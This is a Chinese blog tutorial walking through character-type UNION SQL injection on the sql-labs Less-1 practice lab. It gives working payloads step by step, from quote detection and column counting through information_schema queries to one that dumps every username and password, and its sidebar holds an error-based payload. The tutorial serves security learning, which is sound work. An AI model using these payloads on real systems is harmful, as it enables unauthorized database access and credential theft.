SQL注入——字符型union注入

已于 2023-03-05 13:02:50 修改
阅读量503 收藏 3
点赞数 1
分类专栏: owasp十大漏洞学习 Web渗透测试 文章标签: 数据库 sql 安全 网络安全 web安全
于 2023-03-04 21:46:37 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/heyingcheng/article/details/129337867
版权

目录

 第一步:查找注入点

第二步:判断是字符型注入还是数字型注入

第三步:由于是字符型注入漏洞,所以需要判断闭合方式

第四步:判断查询函数

第五步:判断回显位置

5.1获取数据库名

5.2获取表名和列名

5.2.1获取表名

补充知识——information_schema

补充知识——group_concat()的作用

5.2.2 获取列名

 第六步:拿到数据库中的所有用户名和密码

最终目标:

使用union注入拿到靶机中数据库里的所有用户名和密码

查询语句:

select 列名 from 表名 where 限定语句

以sql-labs中的less-1为例

 第一步:查找注入点

直接在url栏中执行注入

第二步:判断是字符型注入还是数字型注入

发现不管是输入?id=1 and 1=1还是?id = 1 and 1=2都能够正常显示出页面,所以确定他是字符型注入

第三步:由于是字符型注入漏洞,所以需要判断闭合方式

在url后面输入单引号发现报错,说明闭合方式是单引号

第四步:判断查询函数

这里采用order by 进行测试:

这里输入的sql的意思是,对第8列进行排序,但数据库中没有第八列,故出现报错

继续尝试,得:

当尝试到第3列时,发现可以正常显示,说明数据库的表中有3列

第五步:判断回显位置

发现回显的位置就是2,3的位置:

5.1获取数据库名

5.2获取表名和列名

5.2.1获取表名

补充知识——information_schema

一个特别的数据库:information_schema

这个数据库包含所有mysql数据库的简要信息。其中包含有两个我们进行sql注入时所需要的数据表:表名集合表tables和列名集合表columns

所需的表名信息在:数据库information_schema-->数据表tables-->数据列table_name

?id=-1' union select 1,table_name,3 from information_schema.tables

 

我们知道,tables这张表中的内容是有很多的,但是在上图中只显示出了一个表名,还有很多表名没有显示出来,由此体现出了这条命令的局限性。虽然tables表中有海量的表名,但是我们想要的有效信息是:我当前所用数据库security里面的表名。所以需要对咱们构造的sql语句进行更精确的限制(专门只查数据库security的表)。

直接用database()来代替数据库名更好,更好绕过防火墙:

?id=-1' union select 1,table_name,3 from information_schema.tables where table_schema=database()

但是表名有很多个,只显示了一个,显然是不可取的,所以再进行修改:

补充知识——group_concat()的作用

确保所有查询信息能放到一行显示出来

?id=-1' union select 1,group_concat(table_name),3 from information_schema.tables where table_schema=database()--+

 可以看到数据库security里面的所有表名都被列举出来了:

由此可以猜测,我们所需查询的表名应为users

5.2.2 获取列名

查找当前数据库security中数据表users的列名

所需信息在数据库information_schema数据表columns数据列column_name

?id=-1' union select 1,group_concat(column_name),3 from information_schema.columns where table_schema=database()--+

 现在列出来的是数据库security中的所有列名,我们只想要users表中的列名,接下来再进行构造:

?id=-1' union select 1,group_concat(column_name),3 from information_schema.columns where table_schema=database() and table_name='users'--+

 第六步:拿到数据库中的所有用户名和密码

现在表名和列名都已经很清楚了,所以通过sql直接拿:

?id=-1' union select 1,2,group_concat(username,'--',password) from users--+

由此便拿下该靶场的数据库中的所有用户名和密码了!

是小何不是小盒呀
关注
  • 1
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
SQL注入——mssql注入
01-19
可以在 SQL Server 中执行任何活动。 serveradmin  可以设置服务器范围的配置选项,关闭服务器。 setupadmin 可以管理链接服务器和启动过程,并执行某些系统存储过程(sp_...
DVWA之sql注入——联合注入和报错注入
Williamanddog的博客
12-20 1708
构造payload:1' and extractvalue(1,concat(0x7e,(select column_name from information_schema.columns where table_schema='dvwa' and table_name='users' limit 0,1)))#使用格式:updatexml(xml_document,xpath_string,new_value),作用是将document的中符合string 的字符串替换为value的值。
SQL_les0/基础知识/联合注入常用语句与相关技巧
weixin_45118086的博客
03-18 296
SQL注入 一种针对数据库的攻击方式 危害:数据被破坏、数据被篡改 原理:攻击者通过构造不同的SQL语句来实现对数据库的操作 常见数据库 Oracle SQL Server DB2 PostgreSQL MySQL Access 使用SQL语句对关系数据库进行操作 系统库:information_schema schemat表:存放所有的库(字段为SCHEMA_NAME) tables:存放表的信息,TABLE_NAME字段存放表名,TABLE_SCHEMA存放表所属的库 columns:存放字段的
SQl注入学习
weixin_42451330的博客
06-08 872
如果一个字符的大小是一个字节的,称为窄字节;如果一个字符的大小是两个字节的,成为宽字节,像GB2312、GBK、GB18030、BIG5、Shift_JIS等这些编码都是常说的宽字节。
SQL注入
qq_63785498的博客
06-10 2011
SQL注入语句:1、1';-- -查看有哪些库2、1';-- -查看有哪些表3、1';-- -查看表里面有哪些字段4、1';-- -查看表里面所有字段的内容。
SQL注入总结
zlloveyouforever的博客
03-15 863
简单介绍各种常见的SQL注入,相对都比较初级,进阶操作还需要自己去了解。
SQL注入原理-字符注入
T1ngSh0w的博客
09-13 8292
SQL注入原理-字符注入
黑客学习-sql注入-字符
weixin_49349476的博客
11-24 1411
判断sql漏洞的类字符,利用post手工注入数据库信息,在利用busp进行注入,最终获取账号和密码
漏洞篇(SQL注入一)
m0_58001548的博客
03-26 1026
此时我们输入的第一个单引号将 username 的单引号闭合,相当于输入了一个空用户,or 表示左右两边只要有一边条件判断成立则该语句返回结果为真,其中 1=1 永远为真,所以当前 SQL 语句无论怎么执行结果永远为真,--空格表示注释,注释后面所有代码不再执行。我们可以看到上面我们闭合的方法是没有输入用户的,所以并不能成功登陆。
pikachu如何利用字符SQL注入拿下数据库
m0_61903602的博客
10-30 809
pikachu如何利用字符SQL注入拿下数据库
SQL注入--第二关详细讲解
MAY的博客
04-18 971
SQL命令插入到Web表单递交或输入域或页面请求的查询字符串,最终达到欺骗服务器执行恶意的SQL命令
SQL字符注入漏洞.pdf
07-18
配套博客:https://blog.csdn.net/qq_41739364/article/details/94025729
SQL注入笔记-union联合查询
03-21
SQL注入笔记-union联合查询
Python sql注入 过滤字符串的非法字符实例
12-20
#在开发过程中,要对前端传过来的数据进行验证,防止sql注入攻击,其中的一个方案就是过滤用户传过来的非法的字符 def sql_filter(sql, max_length=20): dirty_stuff = ["\"", "\\", "/", "*", "'", "=", "-", "#",...
sql注入攻击流量情况
07-18
sql注入攻击流量情况
细说——SQL注入的常见方式
LainWith的博客
11-04 6563
目录BurpSuite预配置1. 安装CO22. 配置CO23. 小试牛刀使用pikachu靶场的“字符注入联合查询(union)函数介绍order byunion selectlimit操作报错盲注1. 获取数据库2. 获取敏感信息3.获取 mysql 账号密码其他报错函数4. 获取表名4.1 获取第一张表4.2 获取第二张表4.3 获取所有表5. 获取列5.1 获取第一列5.2 获取第二列5.3 获取所有列6. 获取列中的数据6.1 获取第一组数据6.2 获取第二组数据6.3 获取所有数据布尔盲注
SQL 字符注入
MZa1213123的博客
03-02 4340
CTFHub SQL 字符注入 可以看到我们输入的数据会被单引号所括上 尝试正常的 1 and 1=2 发现没有报错 还是有回显 字符的 1 and 1=2 就相当于只是字符串 并没有发挥其表达式的作用所以这就没有产生错误回显 (不太明白为什么 sql 还是会查询到id = 1 的数据) 这时候我们添加 ' 手动闭合前一个 sql 语句然后再拼接上我们的 sql 语句进行测试 整个的 sql 语句大概是 $ sql = "select Data from table_name .
渗透测试----手把手教你SQL手工注入--(联合查询,报错注入)
最新发布
weixin_52796034的博客
10-09 1194
报错注入是一种特殊的SQL注入攻击方式,它利用了应用程序对异常处理的不完善,通过在输入的SQL语句中插入恶意的SQL语句,达到获取未授权数据的目的。 在报错注入中,我们可以通过在输入的数据中插入SQL语句的异常字符,使得应用程序抛出异常,从而获取应用程序的错误信息。这些错误信息可能包含了应用程序的敏感数据,如数据库表结构、列、存储过程等。
SQL注入字符注入步骤
05-25
字符注入是指攻击者利用输入的字符串类的数据来攻击数据库,从而获取数据库中的数据。其步骤如下: 1. 构造恶意的SQL语句:攻击者通过输入恶意的字符串来构造SQL查询语句,从而获取数据库中的数据。 2. 插入...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值